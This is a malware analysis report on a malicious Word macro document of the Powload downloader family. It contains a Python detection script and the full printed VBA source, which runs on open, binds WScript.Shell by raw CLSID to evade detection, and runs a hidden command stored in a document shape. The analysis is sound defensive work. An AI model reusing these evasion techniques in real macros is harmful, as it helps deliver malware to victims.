Verdict: MALICIOUS
Risk score: 252
Heuristic findings: 9
- ClamAV: Doc.Downloader.Powload-6770836-0 [critical] CLAMAV_DETECTION
  ClamAV detected this file as malware: Doc.Downloader.Powload-6770836-0.
- VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
  Document contains VBA macro code.
- VBA instantiates a dangerous COM class by CLSID [critical] OLE_VBA_GETOBJECT_CLSID_DANGEROUS
  VBA uses GetObject("new:{CLSID}") to instantiate an execution/scripting-capable COM class by its raw CLSID, avoiding the CreateObject ProgID that name-based detection keys on. The CLSID in this sample, 72C24DD5-D70A-438B-8A42-98424B88AFB8 (written without the usual braces), is the one registered for WScript.Shell, so the object bound to bJZMhfmkz is the same WshShell that CreateObject("WScript.Shell") would return. Later in the macro its Run method is invoked as bJZMhfmkz.Run@ with wtMkT = 0 as the window-style argument, i.e. a hidden window; the trailing "@" is a VBA type-declaration character that still resolves to Run on a late-bound call but breaks a literal ".Run " string match.
  Matched line in script:
  vJtCdr = 244440343 + CByte(lXpiQaprL - Sqr(MUsoB)) * vAJInwJ - JfuFNzXw * hlduuMwo / CDate(230627991) * 157094940 * 341266232 / (187077992 - Sin(241141116))
  Set bJZMhfmkz = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8")
  On Error Resume Next
- GetObject call [high] OLE_VBA_GETOBJ
  GetObject call. Matched line in script: the same Set bJZMhfmkz = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8") line reported under the CLSID finding above.
- AutoOpen macro [low] OLE_VBA_AUTOOPEN
  AutoOpen macro: the procedure runs as soon as the document is opened with macros enabled, so the chain below needs no user interaction beyond the enable-content prompt.
  Matched line in script:
  Attribute VB_Customizable = True
  Sub AutoOpen()
  On Error Resume Next
- Suspicious cmd.exe invocation with execution flag [high] SC_STR_CMD
  Suspicious cmd.exe invocation with execution flag. No matched macro line is shown for this finding, and the VBA source in the preview contains no cmd.exe literal: the command string NGHcX that the macro hands to Run is assembled at run time from the text of the document shape "VEwXcPHJQ" (qnESb.TextFrame.TextRange.Text), padded with empty variables. An analyst who wants the actual command line should extract that shape's text from the document rather than grep the decoded VBA.
- Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
  OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  The rule text is generic. For this sample a VBA project was in fact recovered (macros.bas under Extracted artifacts) and the OLE_VBA_* findings above carry the weight; this marker only corroborates the AutoOpen entry point.
- Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
  One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms. Here that file is macros.bas, flagged for name-mangling obfuscation (see Extracted artifacts).
- Embedded URL [info] EMBEDDED_URL
  One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the standard DrawingML XML namespace that Office writes into any document containing drawing objects, such as the shape this macro reads its command from. It is not a network indicator and should not be treated as a C2 or download location.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7693 bytes |

SHA-256: 7f9a545c087e37fba3e90743e6afc571e94fb6290024b2690a317ad4bbf846ee

Detection
ClamAV: No threats found. The Doc.Downloader.Powload hit above is on the parent document; the decoded VBA text is a different byte stream that the signature does not match, so a clean result on the carved source does not contradict the verdict.
Obfuscation or payload: likely. 130 of 193 identifiers look randomly generated (e.g. 'VEXBVWNbs'), consistent with name-mangling obfuscation.
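The two checks this report leans on most, the CLSID-based GetObject and the random-identifier ratio, are straightforward to reproduce over olevba output. The following is an added example written for this page; it is not the analyzer's code and not part of the sample. It runs three pattern checks (GetObject("new:CLSID"), a ".Run" call with an optional type-declaration suffix such as the ".Run@" in this macro, and an auto-exec entry point) plus a simple identifier-mangling heuristic over a few lines copied from the macro preview below. The CLSID table, the keyword list and the randomness thresholds are constructed for the example; the analyzer's own heuristic is not published here, so the 130-of-193 figure above is not reproduced exactly.

```python
"""
Static triage of decoded VBA (olevba output) for the evasions in this report.
Added example for this page; not the analyzer's code and not part of the sample.
"""
import re

# Constructed, minimal CLSID table for the example. For real use, resolve
# unknown CLSIDs against HKCR\CLSID\{...} on a reference Windows build.
KNOWN_CLSIDS = {
    "72C24DD5-D70A-438B-8A42-98424B88AFB8": "WScript.Shell",
    "13709620-C279-11CE-A49E-444553540000": "Shell.Application",
}

CLSID = r"[0-9A-Fa-f]{8}(?:-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}"
# GetObject("new:<CLSID>"), with or without braces around the CLSID
GETOBJECT_NEW = re.compile(r'GetObject\s*\(\s*"new:\{?(' + CLSID + r')\}?"', re.I)
# ".Run" followed by an optional VBA type-declaration character (% & ! # @ $):
# the sample writes ".Run@", which a literal ".Run " match misses.
RUN_CALL = re.compile(r"\.\s*Run[%&!#@$]?(?![A-Za-z0-9_])", re.I)
AUTOEXEC = re.compile(
    r"^\s*(?:Private\s+|Public\s+)?Sub\s+(AutoOpen|AutoExec|AutoNew|Document_Open|Workbook_Open)\b",
    re.I | re.M,
)
IDENT = re.compile(r"\b[A-Za-z_][A-Za-z0-9_]*\b")
# Constructed keyword list: just enough to keep VBA syntax out of the name stats.
VBA_KEYWORDS = {
    "attribute", "sub", "end", "function", "dim", "set", "const", "on", "error",
    "resume", "next", "select", "case", "if", "then", "else", "as", "true", "false",
}


def looks_random(name: str) -> bool:
    """Constructed heuristic: mangled names like 'VEXBVWNbs' carry many
    uppercase letters after the first one and few vowels, while real names
    (AutoOpen, TextFrame) do not. Thresholds are illustrative, not tuned."""
    letters = [c for c in name if c.isalpha()]
    if len(letters) < 5:
        return False
    upper_inside = sum(1 for c in letters[1:] if c.isupper())
    vowels = sum(1 for c in letters if c.lower() in "aeiou")
    return upper_inside / (len(letters) - 1) > 0.35 or vowels / len(letters) < 0.2


def triage(vba: str) -> dict:
    """Return the findings an analyst would want from one decoded module."""
    lines = vba.splitlines()
    clsids = []
    for no, line in enumerate(lines, 1):
        for m in GETOBJECT_NEW.finditer(line):
            clsid = m.group(1).upper()
            clsids.append((no, clsid, KNOWN_CLSIDS.get(clsid, "unknown CLSID")))
    run_calls = [(no, m.group(0)) for no, line in enumerate(lines, 1)
                 for m in RUN_CALL.finditer(line)]
    autoexec = [m.group(1) for m in AUTOEXEC.finditer(vba)]

    # Identifier statistics: drop Attribute lines and string literals first so
    # olevba's module attributes and quoted data do not count as names.
    code = "\n".join(l for l in lines if not l.lstrip().lower().startswith("attribute "))
    code = re.sub(r'"[^"]*"', '""', code)
    idents = {i for i in IDENT.findall(code) if i.lower() not in VBA_KEYWORDS}
    random_idents = {i for i in idents if looks_random(i)}
    ratio = len(random_idents) / len(idents) if idents else 0.0

    return {
        "clsids": clsids,
        "run_calls": run_calls,
        "autoexec": autoexec,
        "identifiers": len(idents),
        "random_identifiers": len(random_idents),
        "obfuscation_likely": ratio >= 0.5,
        "executes_via_com_shell": bool(clsids) and bool(run_calls),
    }


# Lines copied from the macro preview on this page (junk arithmetic and the
# dead Select Case padding omitted); constructed input for the example.
SAMPLE_VBA = '''Attribute VB_Name = "dUwEOEHTNVszmI"
Sub AutoOpen()
On Error Resume Next
Set qnESb = Shapes("VEwXcPHJQ")
NGHcX = "" + MjATXo + JozcQC + qnESb.TextFrame.TextRange.Text + nZBEIYNN + biNnGz + vwWWzl
Set bJZMhfmkz = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8")
Const wtMkT = 0
bJZMhfmkz.Run@ NGHcX, wtMkT
End Sub
'''

if __name__ == "__main__":
    for key, value in triage(SAMPLE_VBA).items():
        print(f"{key}: {value}")
```

On the sample the CLSID resolves to WScript.Shell, the ".Run@" call is caught despite the suffix, AutoOpen is reported as the entry point, and 9 of the 16 non-keyword identifiers are flagged as mangled. A CreateObject("WScript.Shell") line, by contrast, produces no CLSID hit, which is exactly the gap a ProgID-only rule leaves and this one closes.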
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "dUwEOEHTNVszmI"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
Select Case HSwlYD
Case 257757641
ktwci = 122407563
oBEMov = CVKNEqC
duDONW = 174492233
Case 195417733
iLiLuJo = ChrW(118414687)
tltuC = CDate(342035667)
iPcbKz = 319788673
End Select
QQBYP = 34205939 + CByte(OXjicMNHM - Sqr(vzzQais)) * wiHzC - iOiuiI * CzAXVO / CDate(132798842) * 154488641 * 29085208 / (140562981 - Sin(47931546))
On Error Resume Next
Select Case PGAvQJW
Case 16120916
MzVACum = 93186137
nWRkjYTZ = qPhEKGahm
YHWXG = 150069403
Case 130871712
ddNwRiOHP = ChrW(53480062)
WcbrMfn = CDate(319101424)
oOZUI = 225439692
End Select
cRzKNQaq = 313295866 + CByte(tzzpCrSC - Sqr(bzQKrT)) * LIPDtoj - mqPwRGBkv * mpzSmWH / CDate(118483228) * 294822573 * 42734003 / (287773345 - Sin(79917165))
Set qnESb = Shapes("VEwXcPHJQ")
On Error Resume Next
Select Case WCiCrK
Case 94959251
ZVpNW = 338396254
LCwuUlM = XYOzQDUXd
zLSiZs = 241308022
Case 17750352
oOYwONG = ChrW(280063780)
JvFaKJKi = CDate(192156672)
wBFwM = 305015506
End Select
oDhdGKR = 67835489 + CByte(dzZAmKM - Sqr(OhNYBITu)) * aEaiQL - rZCJF * lnQmf / CDate(74574645) * 33232748 * 187661887 / (160391988 - Sin(263751666))
On Error Resume Next
Select Case bCcSwItt
Case 62958939
qTfbQTYSq = 241712008
huwnG = kOztD
qMWqiKMTK = 212089469
Case 154779694
bjsuKFjv = ChrW(269225751)
uHjfsFIi = CDate(66601943)
nVoOt = 194479237
End Select
IdRqBWJMa = 72392160 + CByte(EtKHJJSOJ - Sqr(RHKfW)) * zFrdAjP - RXrslXS * uSaQrj / CDate(79700448) * 205082066 * 316594134 / (208433688 - Sin(132135653))
On Error Resume Next
Select Case XjTLjk
Case 272466793
iHoYSFt = 30910577
wwahHwOZ = HHAvw
RKkFTpj = 7829555
Case 166312401
zPFOo = ChrW(280412632)
GTdiXlQ = CDate(248379269)
mjchX = 259761430
End Select
MGIUn = 247324762 + CByte(MwBZJiIKL - Sqr(ducVtu)) * UUODDYr - KGsIjWqU * QlWLHDw / CDate(182868611) * 137068485 * 74934513 / (25246229 - Sin(195035003))
On Error Resume Next
Select Case vPJlFddU
Case 83662727
GrDRw = 161097481
miwzJ = LwWiJEvTr
aIWXqlkw = 173026373
Case 173062759
iobZdiJ = ChrW(159326751)
zmmVzojv = CDate(129334447)
RnOEcJ = 171647089
End Select
MAuAW = 231073262 + CByte(hIuJjZ - Sqr(vKnoWBZB)) * pcJJm - kzQDdz * mzPDAQj / CDate(270004175) * 249278613 * 257141300 / (283510404 - Sin(206443375))
NGHcX = "" + MjATXo + JozcQC + qnESb.TextFrame.TextRange.Text + nZBEIYNN + biNnGz + vwWWzl
On Error Resume Next
Select Case EFLQMF
Case 60402980
joEpW = 64204107
MDHAZ = nkSoBTpEI
jMsOzOtqT = 14010629
Case 238657475
FoFrBN = ChrW(250379425)
cUBaQV = CDate(299587719)
LlTzbsY = 187766084
End Select
uHwJRhX = 51601780 + CByte(idjJRcS - Sqr(TLLSwiUSi)) * iklMPcOH - nBKnd * qqPrCT / CDate(283450354) * 217961172 * 206113423 / (166769425 - Sin(87462931))
On Error Resume Next
Select Case ajUsY
Case 214145158
roHRp = 119799939
rAcul = dfhMTK
OwfKZazH = 276571149
Case 316614470
qQuUBzYw = ChrW(239035644)
FXZvzBdu = CDate(10672070)
YOzms = 58436433
End Select
rPSzBDsDV = 132102376 + CByte(ikoWa - Sqr(IaGPcZVMo)) * KcRHbsAj - RnETjrch * QRTCnEd / CDate(119055128) * 16611440 * 220984291 / (101507220 - Sin(275546596))
On Error Resume Next
Select Case aKcJPzvpp
Case 303616761
mqiYwQq = 332337074
GLDbHaXO = oKwJQD
NJBtaLCJZ = 196645553
Case 230287373
OhRUNspO = ChrW(47031918)
BoZhW = CDate(6763974)
ddZiajHp = 30767910
End Select
vJtCdr = 244440343 + CByte(lXpiQaprL - Sqr(MUsoB)) * vAJInwJ - JfuFNzXw * hlduuMwo / CDate(230627991) * 157094940 * 341266232 / (187077992 - Sin(241141116))
Set bJZMhfmkz = GetObject("new:72C24DD5-D70A-438B-8A42-98424B88AFB8")
On Error Resume Next
Select Case mUrst
Case 186451845
vIQDrIjan = 163009547
CZYXzh = VijHnu
iYnrsbcRC = 6520647
Case 316895163
hjfYiU = ChrW(310809253)
bnjOV = CDate(62228553)
XzMnVWE = 55511792
End Select
sjvznkWX = 177402935 + CByte(AlpGCmrs - Sqr(vsYWiAF)) * qNapdX - fvZzOrQIo * IohqKBdd / CDate(212186606) * 86648906 * 278037853 / (132435848 - Sin(83846958))
On Error Resume Next
Select Case BlHJUCk
Case 111496066
jKppXQJl = 323244506
iiLurA = TjjksEFPD
VEXBVWNbs = 141762667
Case 256186244
uOCrcTtq = ChrW(277976096)
JaiAhE = CDate(283733543)
jZUao = 214065081
End Select
SNHzTzi = 48045115 + CByte(pViBcmVM - Sqr(FvwSUpIkl)) * NSTZVRJF - sXPiTBKL * qdwDHbi / CDate(240638640) * 191579159 * 604223 / (295659657 - Sin(121480391))
On Error Resume Next
Select Case nwsTzj
Case 233460576
CnFCkEiE = 179595011
IUQPnofEd = NcnzapW
wSpadiBBv = 236688675
Case 266889696
JLiMCvDX = ChrW(73742834)
nuGOb = CDate(171529493)
IbvhlGJFi = 282633276
End Select
OmtvPuLB = 300174018 + CByte(vflziui - Sqr(TODbBnItB)) * FZHTESJ - KsiMDZj * NwJiCLi / CDate(71392612) * 100343537 * 184342520 / (221827915 - Sin(252803337))
Const wtMkT = 0
On Error Resume Next
Select Case iGjXmlKnA
Case 331244510
laDnP = 157788500
tzFul = FoljNcXON
cAbKZPVni = 4150645
Case 247283387
KXBzfnpAu = ChrW(260927616)
mSzzbZY = CDate(174286658)
YdbnnNai = 184092140
End Select
LkLIiO = 224433025 + CByte(wkZMCo - Sqr(psbPuOK)) * zYjvNMS - KZcbkb * TltLb / CDate(274542214) * 98394300 * 81551298 / (178637397 - Sin(255809039))
bJZMhfmkz.Run@ NGHcX, wtMkT
On Error Resume Next
Select Case NEHTiuYJB
Case 294796856
DkoKE = 201904601
VonZQSdV = VwZhO
LSHPOiH = 107961806
Case 242020974
KCiVH = ChrW(296419237)
fUjDFn = CDate(264476594)
pNsDNcLu = 188883186
End Select
VDoQCOY = 20614948 + CByte(GPvzuch - Sqr(MiWFfTbYV)) * NXYwIF - lpaORVfCO * YuNwafhw / CDate(103105344) * 38646926 * 130561702 / (282964539 - Sin(235409846))
On Error Resume Next
Select Case RAZAaOlmq
Case 244152187
ASZiWtJO = 266942196
LSvBmTzH = KctmThnE
rbLWKLYH = 5540673
Case 232215129
aJKVQ = ChrW(35190852)
dznvmfCa = CDate(22551452)
jGzjp = 177185066
End Select
MVpHjdi = 121320173 + CByte(DNBRYW - Sqr(zJFvvp)) * UkIQbumU - inIuQatW * cWboY / CDate(247911660) * 232130652 * 66118830 / (291445427 - Sin(325336249))
End Sub